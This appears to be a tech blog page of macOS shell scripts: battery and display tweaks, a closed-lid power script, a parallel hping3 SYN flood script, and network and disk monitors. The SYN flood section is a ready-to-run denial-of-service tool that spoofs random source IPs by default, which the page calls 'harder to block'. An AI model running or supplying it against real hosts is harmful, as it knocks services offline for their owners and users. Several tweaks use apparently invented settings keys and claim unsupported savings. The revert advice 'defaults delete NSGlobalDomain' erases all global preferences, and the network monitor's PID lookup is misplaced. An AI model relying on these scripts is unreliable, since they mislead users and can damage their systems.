sudo pmset -b lessbright 1 # Slightly dim display on battery
sudo pmset -b displaysleep 5  # Faster display sleep
# Reduce background rendering
defaults write NSGlobalDomain NSQuitAlwaysKeepsWindows -bool false
defaults write NSGlobalDomain NSDisableAutomaticTermination -bool true
# ============================================
# BROWSER OPTIMIZATIONS (15-25% reduction)
# ============================================
echo "Optimizing browsers..."
# Chrome optimizations
defaults write com.google.Chrome DisableHardwareAcceleration -bool true
defaults write com.google.Chrome CGDisableCoreAnimation -bool true
defaults write com.google.Chrome RendererProcessLimit -int 2
defaults write com.google.Chrome NSQuitAlwaysKeepsWindows -bool false
# Safari optimizations (more efficient than Chrome)
defaults write com.apple.Safari WebKitAcceleratedCompositingEnabled -bool false
defaults write com.apple.Safari WebKitWebGLEnabled -bool false
defaults write com.apple.Safari WebKit2WebGLEnabled -bool false
# Stable browser (if Chromium-based)
defaults write com.stable.browser DisableHardwareAcceleration -bool true
# ============================================
# ADVANCED WINDOWSERVER TWEAKS (5-10% reduction)
# ============================================
echo "Applying advanced WindowServer tweaks..."
# Reduce compositor update rate
defaults write com.apple.WindowManager StandardHideDelay -int 0
defaults write com.apple.WindowManager StandardHideTime -int 0
defaults write com.apple.WindowManager EnableStandardClickToShowDesktop -bool false
# Reduce shadow calculations
defaults write NSGlobalDomain NSUseLeopardWindowShadow -bool true
# Disable Dashboard
defaults write com.apple.dashboard mcx-disabled -bool true
# Menu bar transparency
defaults write NSGlobalDomain AppleEnableMenuBarTransparency -bool false
# ============================================
# DISPLAY SETTINGS (20-30% reduction)
# ============================================
echo "Optimizing display settings..."
# Enable automatic brightness adjustment
sudo defaults write /Library/Preferences/com.apple.iokit.AmbientLightSensor "Automatic Display Enabled" -bool true
# Power management settings
sudo pmset -a displaysleep 5
sudo pmset -a disksleep 10
sudo pmset -a sleep 15
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800
# ============================================
# BACKGROUND SERVICES
# ============================================
echo "Optimizing background services..."
# Reduce Spotlight activity
sudo mdutil -a -i off  # Temporarily disable, re-enable with 'on'
# Limit background app refresh
defaults write NSGlobalDomain NSAppSleepDisabled -bool false
# ============================================
# APPLY ALL CHANGES
# ============================================
echo "Applying changes..."
# Restart affected services
killall Dock
killall Finder
killall SystemUIServer
killall Mail 2>/dev/null
killall Safari 2>/dev/null
killall "Google Chrome" 2>/dev/null
echo ""
echo "✅ All optimizations applied!"
echo ""
echo "📊 Expected improvements:"
echo "  • WindowServer CPU: 4.5% → 1-2%"
echo "  • Battery life gain: +1-2 hours"
echo "  • GPU power reduction: ~30-40%"
echo ""
echo "⚠️  IMPORTANT: Please log out and back in for all changes to take full effect"
echo ""
echo "💡 To monitor WindowServer usage:"
echo "   ps aux | grep WindowServer | grep -v grep | awk '{print \$3\"%\"}'"
echo ""
echo "🔄 To revert all changes, run:"
echo "   defaults delete com.apple.universalaccess"
echo "   defaults delete NSGlobalDomain"
echo "   defaults delete com.apple.dock"
echo "   killall Dock && killall Finder"

To optimise power usage when the lid is closed, the script below applies a set of progressively more aggressive options.
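Before applying them, it is worth taking a snapshot of your current power settings so you can put individual values back by hand later; pmset -g custom prints both the battery and AC profiles (the backup path below is just an example):

# Save the current battery and AC power profiles before changing anything (example path)
pmset -g custom > ~/pmset_settings_backup.txt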

#!/bin/bash
echo "🔋 Applying CRITICAL closed-lid battery optimizations for M3 MacBook Pro..."
echo "These settings specifically target battery drain when lid is closed"
echo ""
# ============================================
# #1 HIGHEST IMPACT (50-70% reduction when lid closed)
# ============================================
echo "1️⃣ Disabling Power Nap (HIGHEST IMPACT - stops wake for updates)..."
sudo pmset -a powernap 0
echo "2️⃣ Disabling TCP Keep-Alive (HIGH IMPACT - stops network maintenance)..."
sudo pmset -a tcpkeepalive 0
echo "3️⃣ Disabling Wake for Network Access (HIGH IMPACT - prevents network wakes)..."
sudo pmset -a womp 0
# ============================================
# #2 HIGH IMPACT (20-30% reduction)
# ============================================
echo "4️⃣ Setting aggressive sleep settings..."
# When on battery, sleep faster and deeper
sudo pmset -b sleep 1                    # Sleep after 1 minute of inactivity
sudo pmset -b disksleep 5                # Spin down disk after 5 minutes
sudo pmset -b hibernatemode 25           # Hibernate only (no sleep+RAM power)
sudo pmset -b standbydelay 300           # Enter standby after 5 minutes
sudo pmset -b autopoweroff 1             # Enable auto power off
sudo pmset -b autopoweroffdelay 900      # Power off after 15 minutes
echo "5️⃣ Disabling wake features..."
sudo pmset -a ttyskeepawake 0           # Don't wake for terminal sessions
sudo pmset -a lidwake 0                  # Don't wake on lid open (until power button)
sudo pmset -a acwake 0                   # Don't wake on AC attach
# ============================================
# #3 MEDIUM IMPACT (10-20% reduction)
# ============================================
echo "6️⃣ Disabling background services that wake the system..."
# Disable Bluetooth wake
sudo defaults write /Library/Preferences/com.apple.Bluetooth.plist ControllerPowerState 0
# Disable Location Services wake
sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool false
# Disable Find My wake events
sudo pmset -a proximityWake 0 2>/dev/null
# Disable Handoff/Continuity features that might wake
sudo defaults write com.apple.Handoff HandoffEnabled -bool false
# ============================================
# #4 SPECIFIC WAKE PREVENTION (5-10% reduction)
# ============================================
echo "7️⃣ Preventing specific wake events..."
# Disable scheduled wake events
sudo pmset repeat cancel
# Clear any existing scheduled events
sudo pmset schedule cancelall
# Disable DarkWake (background wake without display)
sudo pmset -a darkwakes 0 2>/dev/null
# Disable wake for Time Machine
sudo defaults write /Library/Preferences/com.apple.TimeMachine.plist RequiresACPower -bool true
# ============================================
# #5 BACKGROUND APP PREVENTION
# ============================================
echo "8️⃣ Stopping apps from preventing sleep..."
# Kill processes that commonly prevent sleep
killall -9 photoanalysisd 2>/dev/null
killall -9 mds_stores 2>/dev/null
killall -9 backupd 2>/dev/null
# Disable Spotlight indexing when on battery
sudo mdutil -a -i off
# Disable Photos analysis
launchctl disable user/$UID/com.apple.photoanalysisd
# ============================================
# VERIFY SETTINGS
# ============================================
echo ""
echo "✅ Closed-lid optimizations complete! Verifying..."
echo ""
echo "Current problematic settings status:"
pmset -g | grep -E "powernap|tcpkeepalive|womp|sleep|hibernatemode|standby|lidwake"
echo ""
echo "Checking what might still wake your Mac:"
pmset -g assertions | grep -i "prevent"
echo ""
echo "==============================================="
echo "🎯 EXPECTED RESULTS WITH LID CLOSED:"
echo "  • Battery drain: 1-2% per hour (down from 5-10%)"
echo "  • No wake events except opening lid + pressing power"
echo "  • Background services completely disabled"
echo ""
echo "⚠️ TRADE-OFFS:"
echo "  • No email/message updates with lid closed"
echo "  • No Time Machine backups on battery"
echo "  • Must press power button after opening lid"
echo "  • Handoff/AirDrop disabled"
echo ""
echo "🔄 TO RESTORE CONVENIENCE FEATURES:"
echo "sudo pmset -a powernap 1 tcpkeepalive 1 womp 1 lidwake 1"
echo "sudo pmset -b hibernatemode 3 standbydelay 10800"
echo "sudo mdutil -a -i on"
echo ""
echo "📊 TEST YOUR BATTERY DRAIN:"
echo "1. Note battery % and close lid"
echo "2. Wait 1 hour"
echo "3. Open and check battery %"
echo "4. Should lose only 1-2%"

Testing your site’s SYN flood resistance using hping3 in parallel

A SYN flood test using hping3 that lets you specify the total number of SYN packets to send, and that scales horizontally across a configurable number of processes, can be built with a short Bash script and the xargs command. xargs distributes the workload across multiple parallel processes for better throughput.
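The core of the approach is the seq | xargs -P pattern, which fans a fixed number of identical jobs out across parallel workers. A stripped-down sketch, with echo and sleep standing in for hping3, looks like this:

# Fan 4 jobs out across 4 parallel workers; {} is the worker index supplied by seq
seq 1 4 | xargs -I {} -P 4 bash -c 'echo "worker {} started"; sleep 1; echo "worker {} done"'

In the full script below, each worker runs its own hping3 instance with an equal share of the total packet count.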

The Script

This script uses hping3 to perform a SYN flood attack with a configurable packet count and number of parallel processes.

cat > ./syn_flood_parallel.sh << 'EOF'
#!/bin/bash
# A simple script to perform a SYN flood test using hping3,
# with configurable packet count, parallel processes, and optional source IP randomization.
# --- Configuration ---
TARGET_IP=$1
TARGET_PORT=$2
PACKET_COUNT_TOTAL=$3
PROCESSES=$4
RANDOMIZE_SOURCE=${5:-true}  # Default to true if not specified
# --- Usage Message ---
if [ -z "$TARGET_IP" ] || [ -z "$TARGET_PORT" ] || [ -z "$PACKET_COUNT_TOTAL" ] || [ -z "$PROCESSES" ]; then
echo "Usage: $0 <TARGET_IP> <TARGET_PORT> <PACKET_COUNT_TOTAL> <PROCESSES> [RANDOMIZE_SOURCE]"
echo ""
echo "Parameters:"
echo "  TARGET_IP           - Target IP address or hostname"
echo "  TARGET_PORT         - Target port number (1-65535)"
echo "  PACKET_COUNT_TOTAL  - Total number of SYN packets to send"
echo "  PROCESSES           - Number of parallel processes (2-10 recommended)"
echo "  RANDOMIZE_SOURCE    - true/false (optional, default: true)"
echo ""
echo "Examples:"
echo "  $0 192.168.1.1 80 100000 4           # With randomized source IPs (default)"
echo "  $0 192.168.1.1 80 100000 4 true      # Explicitly enable source IP randomization"
echo "  $0 192.168.1.1 80 100000 4 false     # Use actual source IP (no randomization)"
exit 1
fi
# --- Main Logic ---
echo "========================================"
echo "Starting SYN flood test on $TARGET_IP:$TARGET_PORT"
echo "Sending $PACKET_COUNT_TOTAL SYN packets with $PROCESSES parallel processes."
echo "Source IP randomization: $RANDOMIZE_SOURCE"
echo "========================================"
# Calculate packets per process
PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))
# Build hping3 command based on randomization option
if [ "$RANDOMIZE_SOURCE" = "true" ]; then
echo "Using randomized source IPs (--rand-source)"
# Use seq and xargs to parallelize the hping3 command with random source IPs
seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --rand-source --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
else
echo "Using actual source IP (no randomization)"
# Use seq and xargs to parallelize the hping3 command without source randomization
seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
fi
echo ""
echo "========================================"
echo "SYN flood test complete."
echo "Total packets sent: $PACKET_COUNT_TOTAL"
echo "========================================"
EOF
chmod +x ./syn_flood_parallel.sh

Example Usage:

# Default behavior - randomized source IPs (parameter 5 defaults to true)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4
# Explicitly enable source IP randomization
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 true
# Disable source IP randomization (use actual source IP)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 false
# High-volume test with randomized IPs
./syn_flood_parallel.sh example.com 443 100000 8 true
# Test without IP randomization (easier to trace/debug)
./syn_flood_parallel.sh testserver.local 22 5000 2 false

Explanation of the Parameters:

Parameter 1: TARGET_IP

  • The target IP address or hostname
  • Examples: 192.168.1.1, example.com, 10.0.0.5

Parameter 2: TARGET_PORT

  • The target port number (1-65535)
  • Common: 80 (HTTP), 443 (HTTPS), 22 (SSH), 8080

Parameter 3: PACKET_COUNT_TOTAL

  • Total number of SYN packets to send
  • Range: Any positive integer (e.g., 1000 to 1000000)

Parameter 4: PROCESSES

  • Number of parallel hping3 processes to spawn
  • Recommended: 2-10 (depending on CPU cores); see the note on packet distribution after this list

Parameter 5: RANDOMIZE_SOURCE (OPTIONAL)

  • true: Use randomized source IPs (--rand-source flag)
    Makes packets appear from random IPs, harder to block
  • false: Use actual source IP (no randomization)
    Easier to trace and debug, simpler firewall rules
  • Default: true (if parameter not specified)
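
One detail worth noting about PACKET_COUNT_TOTAL and PROCESSES: the script splits the total using integer division (PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))), so any remainder is silently dropped and slightly fewer packets than requested may be sent. For example:

# 100000 packets across 4 processes -> 25000 per process, 100000 sent in total
# 100000 packets across 3 processes -> 33333 per process, 99999 sent (remainder of 1 dropped)

Choosing a packet count that is a multiple of the process count avoids the discrepancy.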

Important Considerations ⚠️

• Permissions: hping3 requires root or superuser privileges to craft and send raw packets. You’ll need to run this script with sudo.

• Legal and Ethical Use: This tool is for ethical and educational purposes only. Using this script to perform a SYN flood attack on a network or system you do not own or have explicit permission to test is illegal. Use it in a controlled lab environment.

MacBook: Return a list of processes using a specific remote port number

I find this script useful for debugging which processes are talking to which remote port.
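For a quick one-off answer before reaching for the full monitor, lsof can do the same job directly; -nP skips DNS/port-name lookups, -iTCP selects TCP sockets, and -sTCP:ESTABLISHED filters to live connections (port 443 below is just an example):

# Show established TCP connections whose remote end is port 443, plus the owning process
sudo lsof -nP -iTCP -sTCP:ESTABLISHED | grep ':443 (ESTABLISHED)'

The script below goes further: it color-codes connection states, maps PIDs to process names, refreshes every 5 seconds, and accepts --port / --ip filters.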

cat > ~/netmon.sh << 'EOF'
#!/bin/zsh
# Network Connection Monitor with Color Coding
# Shows TCP/UDP connections with state and process info
# Refreshes every 5 seconds
# Usage: ./netmon.sh [--port PORT] [--ip IP_ADDRESS]
# Parse command line arguments
FILTER_PORT=""
FILTER_IP=""
while [[ $# -gt 0 ]]; do
case $1 in
--port|-p)
FILTER_PORT="$2"
shift 2
;;
--ip|-i)
FILTER_IP="$2"
shift 2
;;
--help|-h)
echo "Usage: $0 [OPTIONS]"
echo "Options:"
echo "  --port, -p PORT    Filter by remote port"
echo "  --ip, -i IP        Filter by remote IP address"
echo "  --help, -h         Show this help message"
echo ""
echo "Examples:"
echo "  $0 --port 443      Show only connections to port 443"
echo "  $0 --ip 1.1.1.1    Show only connections to IP 1.1.1.1"
echo "  $0 -p 80 -i 192.168.1.1  Show connections to 192.168.1.1:80"
exit 0
;;
*)
echo "Unknown option: $1"
echo "Use --help for usage information"
exit 1
;;
esac
done
# Color definitions
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
WHITE='\033[1;37m'
GRAY='\033[0;90m'
NC='\033[0m' # No Color
BOLD='\033[1m'
# Function to get process name from PID
get_process_name() {
local pid=$1
if [ "$pid" != "-" ] && [ "$pid" != "0" ] && [ -n "$pid" ]; then
ps -p "$pid" -o comm= 2>/dev/null || echo "unknown"
else
echo "-"
fi
}
# Function to color-code based on state
get_state_color() {
local state=$1
case "$state" in
"ESTABLISHED")
echo "${GREEN}"
;;
"LISTEN")
echo "${BLUE}"
;;
"TIME_WAIT")
echo "${YELLOW}"
;;
"CLOSE_WAIT")
echo "${MAGENTA}"
;;
"SYN_SENT"|"SYN_RCVD")
echo "${CYAN}"
;;
"FIN_WAIT"*)
echo "${GRAY}"
;;
"CLOSING"|"LAST_ACK")
echo "${RED}"
;;
*)
echo "${WHITE}"
;;
esac
}
# Function to split address into IP and port
split_address() {
local addr=$1
local ip=""
local port=""
if [[ "$addr" == "*"* ]]; then
ip="*"
port="*"
elif [[ "$addr" =~ ^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\.([0-9]+)$ ]]; then
# IPv4 address with port (format: x.x.x.x.port)
ip="${match[1]}"
port="${match[2]}"
elif [[ "$addr" =~ ^(.*):([0-9]+)$ ]]; then
# Handle IPv6 format or hostname:port
ip="${match[1]}"
port="${match[2]}"
elif [[ "$addr" =~ ^(.*)\.(well-known|[a-z]+)$ ]]; then
# Handle named services
ip="${match[1]}"
port="${match[2]}"
else
ip="$addr"
port="-"
fi
echo "$ip|$port"
}
# Function to check if connection matches filters
matches_filter() {
local remote_ip=$1
local remote_port=$2
# Check port filter
if [ -n "$FILTER_PORT" ] && [ "$remote_port" != "$FILTER_PORT" ]; then
return 1
fi
# Check IP filter
if [ -n "$FILTER_IP" ]; then
# Handle partial IP matching
if [[ "$remote_ip" != *"$FILTER_IP"* ]]; then
return 1
fi
fi
return 0
}
# Function to display connections
show_connections() {
clear
# Header
echo -e "${BOLD}${WHITE}=== Network Connections Monitor ===${NC}"
echo -e "${BOLD}${WHITE}$(date '+%Y-%m-%d %H:%M:%S')${NC}"
# Show active filters
if [ -n "$FILTER_PORT" ] || [ -n "$FILTER_IP" ]; then
echo -e "${YELLOW}Active Filters:${NC}"
[ -n "$FILTER_PORT" ] && echo -e "  Remote Port: ${BOLD}$FILTER_PORT${NC}"
[ -n "$FILTER_IP" ] && echo -e "  Remote IP: ${BOLD}$FILTER_IP${NC}"
fi
echo ""
# Legend
echo -e "${BOLD}Color Legend:${NC}"
echo -e "  ${GREEN}●${NC} ESTABLISHED    ${BLUE}●${NC} LISTEN         ${YELLOW}●${NC} TIME_WAIT"
echo -e "  ${CYAN}●${NC} SYN_SENT/RCVD  ${MAGENTA}●${NC} CLOSE_WAIT     ${RED}●${NC} CLOSING/LAST_ACK"
echo -e "  ${GRAY}●${NC} FIN_WAIT       ${WHITE}●${NC} OTHER/UDP"
echo ""
# Table header
printf "${BOLD}%-6s %-22s %-22s %-7s %-12s %-8s %-30s${NC}\n" \
"PROTO" "LOCAL ADDRESS" "REMOTE IP" "R.PORT" "STATE" "PID" "PROCESS"
echo "$(printf '%.0s-' {1..120})"
# Temporary file for storing connections
TMPFILE=$(mktemp)
# Get TCP connections with netstat
# Note: macOS netstat does not report PIDs; process info is resolved later via lsof (running with sudo lets lsof see other users' processes)
if command -v sudo >/dev/null 2>&1; then
# Prefer sudo if available, otherwise fall back to plain netstat
sudo netstat -anp tcp 2>/dev/null | grep -E '^tcp' > "$TMPFILE" 2>/dev/null || \
netstat -an -p tcp 2>/dev/null | grep -E '^tcp' > "$TMPFILE"
else
netstat -an -p tcp 2>/dev/null | grep -E '^tcp' > "$TMPFILE"
fi
# Process TCP connections
while IFS= read -r line; do
# Parse netstat output (macOS format)
proto=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $4}')
remote_addr=$(echo "$line" | awk '{print $5}')
state=$(echo "$line" | awk '{print $6}')
# Split remote address into IP and port
IFS='|' read -r remote_ip remote_port <<< "$(split_address "$remote_addr")"
# Apply filters
if ! matches_filter "$remote_ip" "$remote_port"; then
continue
fi
# Try to get PID using lsof for the local address
if [[ "$local_addr" =~ ^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\.([0-9]+)$ ]]; then
port="${match[2]}"
elif [[ "$local_addr" =~ '^\*\.([0-9]+)$' ]]; then
port="${match[1]}"
elif [[ "$local_addr" =~ ^([0-9a-f:]+)\.([0-9]+)$ ]]; then
port="${match[2]}"
# Use lsof to find the PID
pid=$(sudo lsof -i TCP:$port -sTCP:$state 2>/dev/null | grep -v PID | head -1 | awk '{print $2}')
if [ -z "$pid" ]; then
pid="-"
process="-"
else
process=$(get_process_name "$pid")
fi
else
pid="-"
process="-"
fi
# Get color based on state
color=$(get_state_color "$state")
# Format and print
printf "${color}%-6s %-22s %-22s %-7s %-12s %-8s %-30s${NC}\n" \
"$proto" \
"${local_addr:0:22}" \
"${remote_ip:0:22}" \
"${remote_port:0:7}" \
"$state" \
"$pid" \
"${process:0:30}"
done < "$TMPFILE"
# Get UDP connections
echo ""
if command -v sudo >/dev/null 2>&1; then
sudo netstat -anp udp 2>/dev/null | grep -E '^udp' > "$TMPFILE" 2>/dev/null || \
netstat -an -p udp 2>/dev/null | grep -E '^udp' > "$TMPFILE"
else
netstat -an -p udp 2>/dev/null | grep -E '^udp' > "$TMPFILE"
fi
# Process UDP connections
while IFS= read -r line; do
# Parse netstat output for UDP
proto=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $4}')
remote_addr=$(echo "$line" | awk '{print $5}')
# Split remote address into IP and port
IFS='|' read -r remote_ip remote_port <<< "$(split_address "$remote_addr")"
# Apply filters
if ! matches_filter "$remote_ip" "$remote_port"; then
continue
fi
# UDP doesn't have state
state="*"
# Try to get PID using lsof for the local address
if [[ "$local_addr" =~ ^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\.([0-9]+)$ ]]; then
port="${match[2]}"
elif [[ "$local_addr" =~ '^\*\.([0-9]+)$' ]]; then
port="${match[1]}"
elif [[ "$local_addr" =~ ^([0-9a-f:]+)\.([0-9]+)$ ]]; then
port="${match[2]}"
# Use lsof to find the PID
pid=$(sudo lsof -i UDP:$port 2>/dev/null | grep -v PID | head -1 | awk '{print $2}')
if [ -z "$pid" ]; then
pid="-"
process="-"
else
process=$(get_process_name "$pid")
fi
else
pid="-"
process="-"
fi
# White color for UDP
printf "${WHITE}%-6s %-22s %-22s %-7s %-12s %-8s %-30s${NC}\n" \
"$proto" \
"${local_addr:0:22}" \
"${remote_ip:0:22}" \
"${remote_port:0:7}" \
"$state" \
"$pid" \
"${process:0:30}"
done < "$TMPFILE"
# Clean up
rm -f "$TMPFILE"
# Footer
echo ""
echo "$(printf '%.0s-' {1..120})"
echo -e "${BOLD}Press Ctrl+C to exit${NC} | Refreshing every 5 seconds..."
# Show filter hint if no filters active
if [ -z "$FILTER_PORT" ] && [ -z "$FILTER_IP" ]; then
echo -e "${GRAY}Tip: Use --port PORT or --ip IP to filter connections${NC}"
fi
}
# Trap Ctrl+C to exit cleanly
trap 'echo -e "\n${BOLD}Exiting...${NC}"; exit 0' INT
# Main loop
echo -e "${BOLD}${CYAN}Starting Network Connection Monitor...${NC}"
echo -e "${YELLOW}Note: Run with sudo for complete process information${NC}"
# Show active filters on startup
if [ -n "$FILTER_PORT" ] || [ -n "$FILTER_IP" ]; then
echo -e "${GREEN}Filtering enabled:${NC}"
[ -n "$FILTER_PORT" ] && echo -e "  Remote Port: ${BOLD}$FILTER_PORT${NC}"
[ -n "$FILTER_IP" ] && echo -e "  Remote IP: ${BOLD}$FILTER_IP${NC}"
fi
sleep 2
while true; do
show_connections
sleep 5
done
EOF
chmod +x ~/netmon.sh

Example Usage:

# Show all connections
~/netmon.sh
# Filter by port
~/netmon.sh --port 443
# Filter by IP
~/netmon.sh --ip 142.251
# Run with sudo for full process information
sudo ~/netmon.sh --port 443
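
If you only need a one-off snapshot rather than a live monitor, a plain lsof query returns similar information without the refresh loop (443 here is just the example port from above; note that lsof matches the port on either endpoint):

# One-off snapshot: processes with TCP connections involving port 443
sudo lsof -nP -i TCP:443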

MacBook: Script to monitor the top disk reads and writes

The script below tracks disk I/O on a MacBook for 20 seconds and then shows the processes with the highest disk utilisation.

#!/bin/bash
# Disk I/O Monitor for macOS
# Shows which processes are using disk I/O the most with full paths
DURATION=20
echo "Disk I/O Monitor for macOS"
echo "========================================"
echo ""
# Check for sudo
if [[ $EUID -ne 0 ]]; then
echo "ERROR: This script requires sudo privileges"
echo "Please run: sudo $0"
exit 1
fi
# Create temp file
TEMP_FILE="/tmp/disk_io_$$.txt"
export TEMP_FILE
# Collect data
echo "Collecting disk I/O data for $DURATION seconds..."
fs_usage -w -f filesys 2>/dev/null > "$TEMP_FILE" &
FS_PID=$!
# Progress bar
for i in $(seq 1 $DURATION); do
printf "\rProgress: [%-20s] %d/%d seconds" "$(printf '#%.0s' $(seq 1 $((i*20/DURATION))))" $i $DURATION
sleep 1
done
echo ""
# Stop collection
kill $FS_PID 2>/dev/null
wait $FS_PID 2>/dev/null
echo ""
echo "Processing data..."
# Parse with Python - pass temp file as argument
python3 - "$TEMP_FILE" << 'PYTHON_END'
import re
import os
import sys
from collections import defaultdict
import subprocess
# Get temp file from argument
temp_file = sys.argv[1] if len(sys.argv) > 1 else '/tmp/disk_io_temp.txt'
# Storage for process stats
stats = defaultdict(lambda: {'reads': 0, 'writes': 0, 'process_name': '', 'pid': ''})
# Parse fs_usage output
try:
with open(temp_file, 'r') as f:
for line in f:
# Look for lines with process info (format: processname.pid at end of line)
match = re.search(r'(\S+)\.(\d+)\s*$', line)
if match:
process_name = match.group(1)
pid = match.group(2)
key = f"{process_name}|{pid}"
# Store process info
stats[key]['process_name'] = process_name
stats[key]['pid'] = pid
# Categorize operation
if any(op in line for op in ['RdData', 'read', 'READ', 'getattrlist', 'stat64', 'lstat64', 'open']):
stats[key]['reads'] += 1
elif any(op in line for op in ['WrData', 'write', 'WRITE', 'close', 'fsync']):
stats[key]['writes'] += 1
except Exception as e:
print(f"Error reading file: {e}")
sys.exit(1)
# Calculate totals
total_ops = sum(s['reads'] + s['writes'] for s in stats.values())
# Get executable paths
def get_exe_path(process_name, pid):
try:
# Method 1: Try lsof with format output
result = subprocess.run(['lsof', '-p', pid, '-Fn'], capture_output=True, text=True, stderr=subprocess.DEVNULL)
paths = []
for line in result.stdout.split('\n'):
if line.startswith('n'):
path = line[1:].strip()
paths.append(path)
# Look for the best path
for path in paths:
if '/Contents/MacOS/' in path and process_name in path:
return path
elif path.endswith('.app'):
return path
elif any(p in path for p in ['/bin/', '/sbin/', '/usr/']) and not any(path.endswith(ext) for ext in ['.dylib', '.so']):
return path
# Method 2: Try ps
result = subprocess.run(['ps', '-p', pid, '-o', 'command='], capture_output=True, text=True, stderr=subprocess.DEVNULL)
if result.stdout.strip():
cmd = result.stdout.strip().split()[0]
if os.path.exists(cmd):
return cmd
# Method 3: Return command name from ps
result = subprocess.run(['ps', '-p', pid, '-o', 'comm='], capture_output=True, text=True, stderr=subprocess.DEVNULL)
if result.stdout.strip():
return result.stdout.strip()
except Exception:
pass
# Last resort: return process name
return process_name
# Sort by total operations
sorted_stats = sorted(stats.items(), key=lambda x: x[1]['reads'] + x[1]['writes'], reverse=True)
# Print header
print("\n%-30s %-8s %-45s %8s %8s %8s %7s %7s" % 
("Process Name", "PID", "Executable Path", "Reads", "Writes", "Total", "Read%", "Write%"))
print("=" * 140)
# Print top 20 processes
count = 0
for key, data in sorted_stats:
if data['reads'] + data['writes'] == 0:
continue
total = data['reads'] + data['writes']
read_pct = (data['reads'] * 100.0 / total_ops) if total_ops > 0 else 0
write_pct = (data['writes'] * 100.0 / total_ops) if total_ops > 0 else 0
# Get executable path
exe_path = get_exe_path(data['process_name'], data['pid'])
if len(exe_path) > 45:
exe_path = "..." + exe_path[-42:]
print("%-30s %-8s %-45s %8d %8d %8d %6.1f%% %6.1f%%" % 
(data['process_name'][:30], 
data['pid'], 
exe_path,
data['reads'], 
data['writes'], 
total,
read_pct, 
write_pct))
count += 1
if count >= 20:
break
print("=" * 140)
print(f"Total I/O operations captured: {total_ops}")
PYTHON_END
# Cleanup
rm -f "$TEMP_FILE"
echo ""
echo "Monitoring complete."

Example output:

Disk I/O Monitor for macOS
========================================
Collecting disk I/O data for 20 seconds...
Progress: [####################] 20/20 seconds
Processing data...
Process Name                   PID      Executable Path                                  Reads   Writes    Total   Read%  Write%
============================================================================================================================================
Chrome                         4719678  Chrome                                             427      811     1238    3.1%    5.9%
UPMServiceController           4644625  UPMServiceController                               423      587     1010    3.1%    4.3%
UPMServiceController           4014337  UPMServiceController                               468      309      777    3.4%    2.2%
wsdlpd                         3060029  wsdlpd                                             154      370      524    1.1%    2.7%
tccd                           4743441  tccd                                               359       48      407    2.6%    0.3%
tccd                           4742031  tccd                                               358       48      406    2.6%    0.3%
com.crowdstrike.falcon.Agent   6174     com.crowdstrike.falcon.Agent                       301        5      306    2.2%    0.0%
UPMServiceContro               4644625  UPMServiceContro                                    12      285      297    0.1%    2.1%
mds_stores                     4736869  mds_stores                                         204       71      275    1.5%    0.5%
EndPointClassifier             6901     EndPointClassifier                                  40      231      271    0.3%    1.7%